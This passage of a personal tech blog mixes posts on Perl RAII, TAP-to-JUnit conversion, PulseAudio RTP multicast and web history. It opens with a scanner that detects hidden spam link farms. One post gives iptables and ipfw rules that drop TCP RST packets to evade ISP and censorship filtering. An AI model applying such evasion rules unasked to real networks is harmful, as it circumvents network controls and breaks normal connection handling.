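    parser.feed(html)
    parser.close()
    hidden = [l for l in parser.links if l.hidden]
    spammy = [l for l in parser.links
              if any(w in (l.text + " " + l.href).lower() for w in SPAM_WORDS)]
    return {
        "total_links": len(parser.links),
        "hidden_links": len(hidden),
        "spam_keyword_links": len(spammy),
        "infected": max(len(hidden), len(spammy)) >= HIDDEN_LINK_THRESHOLD,
    }


def sample_page(infected: bool) -> str:
    """Constructed sample page; with infected=True a hidden link farm is appended
    after the footer, the way the blogs quoted above were modified."""
    body = ("<html><body><h1>My blog</h1>"
            "<p><a href='/'>Home</a> <a href='/about'>About</a></p>"
            "<p>Today's post.<br>More text <a href='http://example.org/'>a link</a></p>"
            "<div id='footer'>Powered by WordPress</div>")
    if infected:
        farm = "".join(
            f"<a href='http://spam{i}.invalid/'>{SPAM_WORDS[i % len(SPAM_WORDS)].title()} cheap</a>"
            for i in range(30))
        body += f"<div style='display:none'>{farm}</div>"
    return body + "</body></html>"


if __name__ == "__main__":
    for label in (False, True):
        print("infected" if label else "clean", scan(sample_page(label)))
```

Run it over the saved HTML of a few of your own pages (a fetch with curl or wget, then scan(open(path).read())); a legitimate page has a handful of visible links, while an infected one shows dozens of hidden ones in one block.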

Google now include Code Search in normal results

Latest Google curiosity… I hadn’t spotted this before: it appears Google is now including ‘Code Snippet’ results in the results for its normal search. For example, a search for XSLoader gives this result:

[image: Google search results for “XSLoader”, showing a Code Snippet result]

The results highlighted on the page are for a local variable in a Java module, rather than the much more common XSLoader perl module. I guess ‘Code Snippet’ search is case-sensitive.

RAII in perl

Suppose you have matching start() and end() functions. You want to ensure that each start() is always matched with its corresponding end(), without having to explicitly pepper your code with calls to that function. Here’s a good way to do it in perl — create a guard object:

package Scoper;
use strict;
use warnings;

# Wrap a cleanup callback in an object. The callback runs from DESTROY,
# i.e. as soon as the last reference to the object goes away.
sub new {
  my ($class, $func) = @_;
  return bless({ func => $func }, $class);
}
sub DESTROY {
  my $self = shift;
  $self->{func}->();
}

Here’s an example of its use:

{
  start();
  my $s = Scoper->new(sub { end(); });
  # ... do something ...
}
# at this point, end() has been called, even if a die() occurred

The idea is simply to use DESTROY to perform whatever the cleanup operation is. Perl uses reference counting rather than a tracing garbage collector, so as soon as $s goes out of scope its reference count drops to zero, it is freed immediately, and $s->DESTROY() is called in the process; the timing is deterministic, not “whenever the GC gets around to it”. In other words, it’s using the object lifetime rules for its own ends. One caveat: if the cleanup code itself uses eval, wrap that in a local $@, otherwise it can clobber the exception that is being propagated out of the block.

Unlike an eval { } block to catch die()s, this will even be called if exit() or POSIX::exit() is called. (POSIX::_exit(), however, skips DESTROY.)

This is a pretty old C++ pattern — Resource Acquisition Is Initialization. C++’s auto_ptr template class is the best-known example in that language. Here’s a perl.com article on its use in perl, from last year, mostly regarding the CPAN module Object::Destroyer. To be honest, though, it’s 6 lines of code — not sure if that warrants a CPAN module! ;)

RAII is used in SpamAssassin, in the Mail::SpamAssassin::Util::ScopedTimer class.

“What’s New” archaeology

jwz has, incredibly, resurrected home.mcom.com, the WWW site of the Mosaic Communications Corporation, as it was circa Oct 1994.

Edmund Roche-Kelly was kind enough to get in touch and note this link — http://home.mcom.com/home/whatsnew/whats_new_0993.html:

September 3, 1993

IONA Technologies (whose product, Orbix, is the first full and complete implementation of the Object Management Group’s Common Object Request Broker Architecture, or CORBA) is now running a Web server.

An online pamphlet on the Church of the SubGenius is now available.

Guess who was responsible for those two ;)

I was, indeed, running the IONA web server — it was set up in June 1993, and ran Plexus, a HTTP server written in Perl. IONA’s server was somewhere around public web server number 70, world-wide.

The SubGenius pamphlet is still intact, btw, although at a more modern, “hyplan”-less URL these days. It’ll be 15 years old in 6 months… how time flies!

Sharing, not consuming, news

The New York Times yesterday had a great article about modern news consumption:

According to interviews and recent surveys, younger voters tend to be not just consumers of news and current events but conduits as well — sending out e-mailed links and videos to friends and their social networks. And in turn, they rely on friends and online connections for news to come to them. In essence, they are replacing the professional filter — reading The Washington Post, clicking on CNN.com — with a social one.

“There are lots of times where I’ll read an interesting story online and send the URL to 10 friends,” said Lauren Wolfe, 25, the president of College Democrats of America. “I’d rather read an e-mail from a friend with an attached story than search through a newspaper to find the story.”

[Jane Buckingham, the founder of the Intelligence Group, a market research company] recalled conducting a focus group where one of her subjects, a college student, said, “If the news is that important, it will find me.”

In other words, as Techdirt put it, this generation of news readers now focuses on sharing the news, rather than just consuming it — and if you want to share a news story, there’s no point passing on a subscription-only URL that your friends and contacts cannot read.

What newspapers need to do to remain relevant for this generation of news consumers is not to hide their content behind paywalls and registration-required screens. The Guardian got their heads around this a few years back, and have come along in leaps and bounds since then. I wonder if the Irish Times is listening?

converting TAP output to JUnit-style XML

Here’s a perl script that may prove useful: tap-to-junit-xml

NAME

tap-to-junit-xml – convert perl-style TAP test output to JUnit-style XML

SYNOPSIS

tap-to-junit-xml "test suite name" [ outputprefix ] < tap_output.log

DESCRIPTION

Parse test suite output in TAP (Test Anything Protocol) format, and produce XML output in a similar format to that produced by the <junit> ant task. This is useful for consumption by continuous-integration systems like Hudson.

Written in perl, requires TAP::Parser and XML::Generator. It's based on junit_xml.pl by Matisse Enzer, although pretty much entirely rewritten.
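As an added example (not the tap-to-junit-xml script itself), here is a minimal converter along the same lines, built on the core TAP::Parser module and writing the XML by hand so it runs on a stock perl without XML::Generator. The sample TAP input is constructed; the suite name and output shape follow the SYNOPSIS above. It also covers one case worth getting right in CI: a plan of 1..N with fewer than N results is reported as a failure rather than silently passing.

```perl
#!/usr/bin/perl
# Added example, not the tap-to-junit-xml script itself: a minimal TAP -> JUnit-style
# XML converter built on the core TAP::Parser module, writing the XML by hand
# rather than with XML::Generator so it runs with a stock perl.
use strict;
use warnings;
use TAP::Parser;

sub xml_escape {
    my $s = shift;
    $s =~ s/&/&amp;/g; $s =~ s/</&lt;/g; $s =~ s/>/&gt;/g; $s =~ s/"/&quot;/g;
    return $s;
}

# Each TAP test line becomes a <testcase>. A "not ok" that is not TODO becomes a
# <failure> carrying the "# ..." diagnostic lines that followed it; a SKIP becomes
# <skipped/>; a TODO failure counts as a pass, as it does in TAP. Tests that were
# planned (1..N) but never ran are reported as an extra failing case, since a
# suite that dies half-way must not look green to the CI server.
sub tap_to_junit {
    my ($suite, $tap) = @_;
    my $parser = TAP::Parser->new({ tap => $tap });
    my (@cases, $cur);
    while (my $r = $parser->next) {
        if ($r->is_test) {
            (my $desc = $r->description) =~ s/^\s*-\s*|\s+$//g;  # drop the "- " TAP convention
            $cur = { num => $r->number, name => $desc, ok => $r->is_ok,
                     skip => $r->has_skip, diag => [] };
            push @cases, $cur;
        } elsif ($r->is_comment && $cur) {
            push @{ $cur->{diag} }, $r->raw;    # diagnostics belong to the preceding test
        }
    }
    my $planned  = $parser->tests_planned || 0;
    my $missing  = $planned > @cases ? $planned - @cases : 0;
    my $failures = scalar(grep { !$_->{ok} } @cases) + $missing;
    my $skipped  = scalar(grep { $_->{skip} } @cases);
    my $name     = xml_escape($suite);

    my $xml = qq{<?xml version="1.0" encoding="UTF-8"?>\n};
    $xml .= sprintf qq{<testsuite name="%s" tests="%d" failures="%d" skipped="%d">\n},
        $name, @cases + $missing, $failures, $skipped;
    for my $c (@cases) {
        $xml .= sprintf qq{  <testcase classname="%s" name="%s">}, $name,
            xml_escape("$c->{num} - $c->{name}");
        if ($c->{skip}) {
            $xml .= "<skipped/>";
        } elsif (!$c->{ok}) {
            $xml .= sprintf qq{\n    <failure message="%s">%s</failure>\n  },
                xml_escape("test $c->{num} failed"), xml_escape(join "\n", @{ $c->{diag} });
        }
        $xml .= "</testcase>\n";
    }
    if ($missing) {
        $xml .= sprintf qq{  <testcase classname="%s" name="plan"><failure message="%d of %d planned tests did not run"/></testcase>\n},
            $name, $missing, $planned;
    }
    return $xml . "</testsuite>\n";
}

# Constructed sample TAP, standing in for "< tap_output.log". Test 5 is planned
# but never runs, so the suite must end up with 2 failures out of 5.
my $sample = <<'TAP';
1..5
ok 1 - connects to server
not ok 2 - rejects expired certificate
# Failed test 'rejects expired certificate'
# at t/tls.t line 12.
ok 3 - verifies hostname # SKIP no network
not ok 4 - pins public key # TODO not implemented yet
TAP

# Usage follows the SYNOPSIS above: suite name as the argument, TAP on stdin.
# With no arguments the constructed sample is converted instead.
my $out = @ARGV ? tap_to_junit($ARGV[0], do { local $/; <STDIN> })
                : tap_to_junit('sample suite', $sample);
print $out;
```

The leading "- " is stripped defensively because TAP::Parser's description() may or may not include it depending on the Test::Harness version; everything else relies only on documented TAP::Parser methods (next, is_test, is_comment, number, description, is_ok, has_skip, raw, tests_planned).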

Pulseaudio ate my wifi

I’ve just spent a rather frustrating morning attempting to debug major performance problems with my home wireless network; one of my machines couldn’t associate with the AP at all anymore, and the laptop (which was upstairs in the home office, for a change) was getting horrific, sub-dialup speeds.

I did lots of moving of Linksys APs and tweaking of “txpower” settings, without much in the way of results. Cue tearing hair out etc.

Eventually, I logged into the OpenWRT AP over SSH, ran iftop to see which clients were using the wifi, and saw that right at the top, chewing up all the available bandwidth, was traffic to the multicast group 224.0.0.56. The culprit! There was nothing wrong with the wifi setup after all; the problem was massive bandwidth consumption crowding out all other traffic.

You see, “pulseaudio”, the new Linux sound server, has a very nifty feature: streaming of music to any number of listeners over RTP. This is great. What’s not so great is that this seems to have magically turned itself on, and was multicasting a continuous UDP/RTP stream onto my wifi network, which didn’t have the bandwidth to carry it.

Here’s how to turn this off without killing “pulseaudio”. Start “paman”, the PulseAudio Manager, and open the “Devices” tab:


Select the “RTP Monitor Stream” in the “Sources” list, and open “Properties”:

Hit the “Kill” button, and your network is back to normal. Phew.

Another (quicker) way to do this, is using the command-line “pacmd” tool:

echo kill-source-output 0 | pacmd

It’s a mystery where this is coming from, btw. Here’s what “paman” says it came from:

But I don’t seem to have an active ‘module-rtp-send’ line in my configuration:

: jm 98...; grep module-rtp-send /etc/pulse/* /home/jm/.pulse*
/etc/pulse/default.pa:#load-module module-rtp-send source=rtp.monitor

Curious. And irritating.

Update: it turns out there’s another source of configuration — GConf. “paprefs” can be used to examine that, and that’s where the setting had been set, undoubtedly by me hacking about at some stage. :(

more crap from St. Petersburg

Noted with alarm in this comment regarding the horrific privacy-invading adware that is Phorm:

Their programmers are mostly Saint Petersburg-based, home to the Russian Business Network. Their servers are kept only in Saint Petersburg and China, so no ISP customer data is ever stored in the UK. Any personally identifying information they obtain about UK citizens can never be seen or purged using existing UK Data Protection Laws.

St. Petersburg is turning out to be quite a source of online nastiness — the new Boca Raton.

Evading Audible Magic’s Copysense filtering

As I noted on Monday, the Irish branches of several major record companies have brought a case against Eircom, demanding in part that the ISP install Audible Magic’s Copysense anti-filesharing appliances on their network infrastructure.

I thought I’d do a quick bit of research online into how they do their filtering. Here’s what the EFF had to say:

Audible Magic’s technology can easily be defeated by using one-time session key encryption (e.g., SSL) or by modifying the behavior of the network stack to ignore RST packets.

It’s interesting to see that they used RST packets — this is the same mechanism used by the “Great Firewall of China” to censor the internet:

the keyword detection is not actually being done in large routers on the borders of the Chinese networks, but in nearby subsidiary machines. When these machines detect the keyword, they do not actually prevent the packet containing the keyword from passing through the main router (this would be horribly complicated to achieve and still allow the router to run at the necessary speed). Instead, these subsidiary machines generate a series of TCP reset packets, which are sent to each end of the connection. When the resets arrive, the end-points assume they are genuine requests from the other end to close the connection — and obey. Hence the censorship occurs.

But there’s a very easy way to avoid this, according to that blog post:

However, because the original packets are passed through the firewall unscathed, if both of the endpoints were to completely ignore the firewall’s reset packets, then the connection will proceed unhindered! We’ve done some real experiments on this — and it works just fine!! Think of it as the Harry Potter approach to the Great Firewall — just shut your eyes and walk onto Platform 9¾.

Clayton, Murdoch, and Watson’s paper on this technique provides the Linux and FreeBSD firewall commands they used to do this. Here’s Linux:

   iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP

For FreeBSD, the command is:

   ipfw add 1000 drop tcp from any to me tcpflags rst in

So assuming Copysense haven’t changed their approach yet, it’s trivial to get past Copysense’s filtering, if both ends are running Linux or BSD. The rule is a blunt instrument, though: it also drops legitimate resets, so a connection to a peer that has crashed or closed the port hangs until it times out instead of failing immediately. I predict if Copysense becomes widespread, someone will patch Windows TCP to do the same.
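To make the “both ends” condition concrete, here is an added toy model of the mechanism described above (my code, not anything from the Clayton/Murdoch/Watson paper or the EFF). The middlebox never touches data segments; on a keyword match it only injects a RST towards each endpoint, and each endpoint either honours RSTs as normal TCP does or drops them as the iptables/ipfw rules above do. The request segments and keyword are constructed.

```perl
#!/usr/bin/perl
# Added example, a toy model rather than code from the paper or the EFF: shows
# why ignoring forged RSTs defeats keyword-triggered reset injection only when
# BOTH endpoints do it. Data segments always pass the middlebox untouched; on a
# keyword match it merely injects a RST towards each endpoint.
use strict;
use warnings;

# Run one transfer. Each endpoint either honours RSTs (normal TCP) or drops them,
# which is what the iptables/ipfw rules quoted above do for the whole host.
sub transfer {
    my %o = @_;
    my %ep = (
        client => { open => 1, drop_rst => $o{client_drops_rst} },
        server => { open => 1, drop_rst => $o{server_drops_rst}, received => '' },
    );
    my $delivered = 0;
    for my $seg (@{ $o{segments} }) {
        # Once either side has torn the connection down the transfer is over:
        # a real peer would answer the next segment with a genuine RST.
        last unless $ep{client}{open} && $ep{server}{open};
        $ep{server}{received} .= $seg;           # the offending segment itself gets through
        $delivered++;
        if (index($seg, $o{keyword}) >= 0) {     # middlebox sees the keyword...
            for my $side (qw(client server)) {   # ...and forges a RST to each end
                $ep{$side}{open} = 0 unless $ep{$side}{drop_rst};
            }
        }
    }
    return {
        delivered => $delivered,
        total     => scalar @{ $o{segments} },
        complete  => $delivered == @{ $o{segments} } ? 1 : 0,
        received  => $ep{server}{received},
    };
}

# Constructed request split across three segments; the middle one contains the
# string the filter is looking for.
my @segments = ("GET /share/", "blocked-title", ".mp3 HTTP/1.0\r\n\r\n");
for my $cfg ([0, 0], [1, 0], [0, 1], [1, 1]) {
    my $r = transfer(segments => \@segments, keyword => 'blocked-title',
                     client_drops_rst => $cfg->[0], server_drops_rst => $cfg->[1]);
    printf "client drops RST: %d  server drops RST: %d  -> %d/%d segments, %s\n",
        @$cfg, $r->{delivered}, $r->{total},
        $r->{complete} ? 'transfer completes' : 'connection reset';
}
```

Only the last configuration completes the transfer: when either side still honours the forged reset it closes, and the other side's data has nowhere to go, which is exactly why the post's condition is “both ends”. The model leaves out one detail that matters in practice: a real TCP stack only accepts a RST whose sequence number falls within the receive window (RFC 793), so an injector has to track sequence numbers, and a stack that checks them strictly already narrows the attack before any firewall rule is added.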

I love Audible Magic’s response:

The current appliance happens to use the TCP Reset to accomplish this today. There are many other technical methods of blocking transfers. Again, we have strategies to deal with them should they ever prove necessary. This is why we recommend our customers purchase a software support agreement which provides for these enhancements that keep their purchase up-to-date and protect their investment.

in other words, “hey customers! if you don’t have a support contract, you’re shit out of luck when the p2p guys get around our filters!” Nice. ;)